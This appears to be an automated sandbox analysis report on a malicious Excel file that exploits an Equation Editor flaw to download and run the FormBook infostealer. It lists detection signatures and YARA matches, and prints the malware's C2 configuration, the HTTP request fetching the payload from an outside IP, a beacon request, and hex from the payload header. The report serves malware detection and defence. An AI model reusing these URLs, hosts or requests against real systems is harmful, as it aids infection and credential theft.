Windows Analysis Report Sajeeb09908976745344567.xlsx

Overview

General Information

Sample Name: Sajeeb09908976745344567.xlsx
Analysis ID: 502271
MD5: ac493c2681477e3b56acbb570b8e41d9
SHA1: 2d9019b6c2f57c6360b155957cb542ae61bbf728
SHA256: 9efaa722d6e9df7c6628df6d1f49d14d858b60782db11c3f1e9b5037803b290b
Tags: Formbook, VelvetSweatshop, xlsx

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Uses netsh to modify the Windows network and firewall settings
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Drops PE files to the user directory
Dropped file seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

AV Detection:

Found malware configuration
Source: 00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.naplesconciergerealty.com/mxnu/"], "decoy": ["insightmyhome.com", "gabriellamaxey.com", "029atk.xyz", "marshconstructions.com", "technichoffghosts.com", "blue-ivy-boutique-au.com", "1sunsetgroup.com", "elfkuhnispb.store", "caoliudh.club", "verifiedpaypal.net", "jellyice-tr.com", "gatescres.com", "bloomberq.online", "crystaltopagent.net", "uggs-line.com", "ecommerceplatform.xyz", "historyofcambridge.com", "sattaking-gaziabad.xyz", "digisor.com", "beachpawsmobilegrooming.com", "whitebot.xyz", "zacky6.online", "qlfa8gzk8f.com", "scottjasonfowler.com", "influxair.com", "desongli.com", "xn--w7uy63f0ne2sj.com", "pinup722bk.com", "haohuatour.com", "dharmathinkural.com", "hanjyu.com", "tbrhc.com", "clarityflux.com", "meltonandcompany.com", "revgeek.com", "onehigh.club", "closetu.com", "yama-nkok.com", "brandonhistoryandinfo.com", "funkidsroomdecor.com", "epilasyonmerkeziankara.com", "265411.com", "watch12.online", "dealsbonaza.com", "gold2guide.art", "tomclark.online", "877961.com", "washingtonboatrentals.com", "promovart.com", "megapollice.online", "taquerialoteria.com", "foxsontreeservice.com", "safebookkeeping.com", "theeducationwheel.online", "sasanos.com", "procurovariedades.com", "normandia.pro", "ingdalynnia.xyz", "campusguideconsulting.com", "ashramseries.com", "clubcupids.art", "mortgagerates.solutions", "deepscanlabs.com", "insulated-box.com"]}
Multi AV Scanner detection for submitted file
Source: Sajeeb09908976745344567.xlsx Virustotal: Detection: 29%
Source: Sajeeb09908976745344567.xlsx ReversingLabs: Detection: 21%
Yara detected FormBook
Source: Yara match File source: 00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.524713995.00000000097BD000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.556070673.0000000000270000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000001.493342652.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.495823503.0000000003030000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.698011641.0000000000380000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.515415135.00000000097BD000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.556257297.0000000000430000.00000040.00020000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: www.naplesconciergerealty.com/mxnu/ Avira URL Cloud: Label: malware
Source: http://192.3.110.172/000900/vbc.exe Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: www.naplesconciergerealty.com/mxnu/ Virustotal: Detection: 6%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe ReversingLabs: Detection: 36%
Source: C:\Users\Public\vbc.exe ReversingLabs: Detection: 36%
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 5.2.vbc.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.2.netsh.exe.6d3da0.0.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.2.vbc.exe.3030000.4.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.2.netsh.exe.2c6796c.4.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 5.1.vbc.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: netsh.pdb source: vbc.exe, 00000005.00000002.556406324.0000000000553000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe, netsh.exe
Source: C:\Users\Public\vbc.exe Code function: 4_2_00405E93 FindFirstFileA,FindClose, 4_2_00405E93
Source: C:\Users\Public\vbc.exe Code function: 4_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 4_2_004054BD
Source: C:\Users\Public\vbc.exe Code function: 4_2_00402671 FindFirstFileA, 4_2_00402671

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: www.washingtonboatrentals.com
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\Public\vbc.exe Code function: 4x nop then pop ebx 5_2_00406AC1
Source: C:\Users\Public\vbc.exe Code function: 4x nop then pop edi 5_2_0040C3E7
Source: C:\Users\Public\vbc.exe Code function: 4x nop then pop edi 5_2_00415671
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4x nop then pop ebx 8_2_00086AC1
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4x nop then pop edi 8_2_0008C3E7
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4x nop then pop edi 8_2_00095671
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 192.3.110.172:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 192.3.110.172:80

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 3.64.163.50 80
Source: C:\Windows\explorer.exe Domain query: www.washingtonboatrentals.com
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.naplesconciergerealty.com/mxnu/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AMAZON-02US
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 3.64.163.50
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 13 Oct 2021 17:03:16 GMTServer: Apache/2.4.50 (Win64) OpenSSL/1.1.1l PHP/8.0.11Last-Modified: Wed, 13 Oct 2021 06:08:09 GMTETag: "46f39-5ce35c953b021"Accept-Ranges: bytesContent-Length: 290617Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 30 28 81 e9 51 46 d2 e9 51 46 d2 e9 51 46 d2 2a 5e 19 d2 eb 51 46 d2 e9 51 47 d2 71 51 46 d2 2a 5e 1b d2 e6 51 46 d2 bd 72 76 d2 e3 51 46 d2 2e 57 40 d2 e8 51 46 d2 52 69 63 68 e9 51 46 d2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 65 3a ff 56 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5c 00 00 00 d6 01 00 00 04 00 00 fb 30 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 e0 02 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 74 00 00 a0 00 00 00 00 d0 02 00 e0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 7c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 eb 5a 00 00 00 10 00 00 00 5c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 96 11 00 00 00 70 00 00 00 12 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 b0 01 00 00 90 00 00 00 
06 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 50 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 e0 09 00 00 00 d0 02 00 00 0a 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /000900/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.110.172Connection: Keep-Alive
Source: explorer.exe, 00000006.00000000.542838548.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: explorer.exe, 00000006.00000000.521763552.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000006.00000000.542838548.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000006.00000000.542838548.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000006.00000000.539064955.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000006.00000000.504048013.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000006.00000000.504048013.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, vbc.exe, 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000005.00000000.490591816.0000000000409000.00000008.00020000.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: vbc.exe, 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000005.00000000.490591816.0000000000409000.00000008.00020000.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: vbc.exe, 00000004.00000002.494713869.0000000001F10000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.516768137.0000000001BE0000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000006.00000000.510963296.0000000003E50000.00000002.00020000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.504048013.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000006.00000000.521763552.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000006.00000000.521763552.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000006.00000000.504048013.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: vbc.exe, 00000004.00000002.494713869.0000000001F10000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.516768137.0000000001BE0000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.539064955.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 00000006.00000000.521763552.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000006.00000000.542838548.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000006.00000000.504048013.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000006.00000000.521763552.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000006.00000000.514857516.0000000008118000.00000004.00000001.sdmp String found in binary or memory: http://www.mozilla.com0
Source: explorer.exe, 00000006.00000000.542838548.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000006.00000000.547402382.00000000083E6000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/c
Source: explorer.exe, 00000006.00000000.544811252.000000000447A000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000000.544811252.000000000447A000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000006.00000000.547402382.00000000083E6000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerv
Source: explorer.exe, 00000006.00000000.542838548.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000006.00000000.539064955.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000006.00000000.539064955.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000006.00000000.539064955.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AE98A654.emf
Source: unknown DNS traffic detected: queries for: www.washingtonboatrentals.com
Source: global traffic HTTP traffic detected: GET /000900/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.110.172Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mxnu/?0h=6lxhT6_0RrqDgXE0&bV8=5sVEEjOjrPj2idxjAkM9c91RRKirbtM3qCtWvXETAP1vtyCGbasEc4a0ZRfXFvjfhHczKQ== HTTP/1.1User-Agent: Windows ExplorerHost: www.washingtonboatrentals.com

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality for read data from the clipboard
Source: C:\Users\Public\vbc.exe Code function: 4_2_00404FC2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 4_2_00404FC2

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.524713995.00000000097BD000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.556070673.0000000000270000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000001.493342652.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.495823503.0000000003030000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.698011641.0000000000380000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.515415135.00000000097BD000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.556257297.0000000000430000.00000040.00020000.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.524713995.00000000097BD000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.524713995.00000000097BD000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.556070673.0000000000270000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.556070673.0000000000270000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000001.493342652.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000001.493342652.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.495823503.0000000003030000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.495823503.0000000003030000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.698011641.0000000000380000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.698011641.0000000000380000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.515415135.00000000097BD000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.515415135.00000000097BD000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.556257297.0000000000430000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.556257297.0000000000430000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: enable Editing and Content from the Yellow bar 18 above to view locked content. 19 20 0 " 21 22
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Yara signature match
Source: 00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.524713995.00000000097BD000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.524713995.00000000097BD000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.556070673.0000000000270000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.556070673.0000000000270000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000001.493342652.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000001.493342652.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.495823503.0000000003030000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.495823503.0000000003030000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
